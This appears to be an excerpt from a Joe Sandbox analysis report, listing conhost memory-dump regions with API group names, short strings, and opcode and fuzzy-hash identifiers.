        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: 34052c071b719d8e8e72a8c00681c5bf6e8dd6a73386c6b281cb8d86842af472
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: 78F0A432704684D2F7348B68F4843996B62F754BC8F884039EA4942559DF6CC79AC701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: FinalHandleNamePathlstrlen
        • String ID: \\?\
        • API String ID: 2719912262-4282027825
        • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction ID: 9a7224ca8ed6ff55ac9c44dfbb6369fc8dd60dc1c0a8b125d09d88cae787983e
        • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
        • Instruction Fuzzy Hash: 05F0A432704685D2EB249BA8F4C4399AB62F744F88F844039EE8942959EEACC74AC701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: a615e2c07fecb0a86d1218a6a19c0bb271ec05c9b1d00cf2b502f2f473acd8ba
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: 24F08974B04B8091EA284B9BF9141955A52B748FD0F444134FE0A0772ACE2CC657C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: b21fb235a91b4ee90da7b0a0c142b77f7ce56195a3530ed3852a6f17d4db37df
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: 78F09671A00A0181FA288BA8E8453D91B32FB857A0F94023DEA6A451F6DF3CC64AC702
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CombinePath
        • String ID: \\.\pipe\
        • API String ID: 3422762182-91387939
        • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction ID: d0901b0169ebbbc7ebdef58c8a3556640387ee146d66d5ba9f13aeb3dd56de5c
        • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
        • Instruction Fuzzy Hash: EBF08974B04B8081EA184BDBB914199DA62B788FC1F449134FE460771ADE6CD647C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: AddressFreeHandleLibraryModuleProc
        • String ID: CorExitProcess$mscoree.dll
        • API String ID: 4061214504-1276376045
        • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction ID: 019af116400ea184c74576e24e222d32bb597976a66ec0106651c8cbc885f4ba
        • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
        • Instruction Fuzzy Hash: 85F09C7171064181EA184B98E8843D99B75EB85B60F54023DFE7A451F5CF6CC646C701
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction ID: 8554458edd81deb222f63ad67fa4fad62d809b57c071aea4393534bf01a0746e
        • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction Fuzzy Hash: 5A02FB32619B84C6E764CB99F49439ABBA1F3C4794F100029FA8E87BA9DF7CC555CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction ID: 5937e515a267a7103a3ebcf8744dff559d9cb6b554d9d5d05833ab6f95d5e8fd
        • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
        • Instruction Fuzzy Hash: D502C932519BC486E765CB59F49039ABBA1F3C4794F104029FACE87BA9DBBCC545CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: a3f6486def5da78a39bb722cac91ca2fafb2fc73c79e56277302f4424d6059c0
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: B551B131A0460187E36DCB9AE4446DA7BA2F788B84F10403DFE4A43B56DB3CCA57CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction ID: 3e16c67a491fd5f217713d30dd6fa406786d1742dfc1b93882ece04dbb1a4533
        • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
        • Instruction Fuzzy Hash: 9F51D431A04641A7E72DCB9DA45069ABBA6F388B50F10403DFE9A43756DBBCCA07CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: 443372f2e94133890a2d9e75df6503bcfed7df4c90292a98b9b8188077081556
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: 36518F35A1464197E72CCFAEE84069A7BA2F388B84F54412DEE4A43756DF3CCA17CB05
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Value
        • String ID:
        • API String ID: 3702945584-0
        • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction ID: cd9095a9a0778f448d96ee65bc0878cb8f58b228f33e4e829641665f94dcebb6
        • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
        • Instruction Fuzzy Hash: 5751C631A14641E7D72CCF99A45069ABBA2F384B80F10403CEE9A03756DF7CDA07CB01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: fab8fb076477a3eef08acd71fa8e62d9454472066124615102eb78604016ddf0
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: EE61F136A28B44C6E764CB59E45435EBBE2F388784F101229FA8D43BA5DB7CC655CF01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentThread
        • String ID:
        • API String ID: 2882836952-0
        • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction ID: a843344290f62ef94d89df11f8c6fcb590f107abb6472b971d1e107fad49e5b3
        • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
        • Instruction Fuzzy Hash: C261E036929B84C6E765CB59E49435ABBA2F388794F10012AFECD43BA5DB7CC641CF01
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: cf09b268a046f788a69e52a52cbd72adfd6f86636ab978d42c68e64024b35131
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: 3E114236E09740D3FB288B69F40429A6BB1FB45B80F04003AEE4D03795EB7DCA56C785
        APIs
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentProcessProtectVirtual$HandleModule
        • String ID:
        • API String ID: 1092925422-0
        • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction ID: 5b97f4b4fbc870d0e56c7113504ae45148121da877175fb16d409aab253db827
        • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
        • Instruction Fuzzy Hash: 31114636A09740D3EB288BA9E44429AAB71F745B80F04003AEE9D03755EB7DDB55C785
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: fa71f1a5ab83497a7cca10764eec9ec9edb9472936b0af796ae559f20db99883
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 8651E432B116108AEB58CB9DE444BAC7B97F354BD8F144139FA4A4778ADB7CCA62C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
        • String ID: csm
        • API String ID: 2395640692-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: 0e92f28381181a18f15f8e02a7fd8488fd9fd498e3f85fa265d0036eaed9127e
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: F851E532B016908ADB58CF9DE4147AC7B97E355B88F144138FE8A4779AD7BDC942C701
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 6ae441823f66c4dfb1796ada84344aea0e7ca97119b17b64bc4c8c975cd26344
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: C461A172904BC4C1DB249F59E4403DABBA1F785BD4F144229FB9813B96DB7CC2A2CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3055761550.0000013F08E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E60000, based on PE: true
        • Associated: 00000013.00000002.3055284000.0000013F08E60000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3056628998.0000013F08E75000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057143026.0000013F08E80000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057445918.0000013F08E82000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3057817933.0000013F08E89000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e60000_conhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
        • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction ID: a7c294b21de7f01a3a50b3ecbea0311a8586886d1fca64cce65c8fb795595574
        • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
        • Instruction Fuzzy Hash: 99518232D002509BEB788FA995443987F92F355BD4F18413AEA9957B96CB3CC662C702
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: CallEncodePointerTranslator
        • String ID: MOC$RCC
        • API String ID: 3544855599-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: d7fde235d5227e2b93ff57a2711259e3635920c72556fe40edf54c5b2a4e3e89
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: D7618F72904BC485DB359F59E4407DABBA1FB85B94F044229EFD813B96DBBCC292CB01
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000013.00000002.3058635336.0000013F08E91000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000013F08E90000, based on PE: true
        • Associated: 00000013.00000002.3058223651.0000013F08E90000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059184218.0000013F08EA5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3059730149.0000013F08EB0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060239866.0000013F08EB2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000013.00000002.3060760816.0000013F08EB9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_19_2_13f08e90000_conhost.jbxd
        Similarity
        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
        • String ID: csm$csm
        • API String ID: 3896166516-3733052814
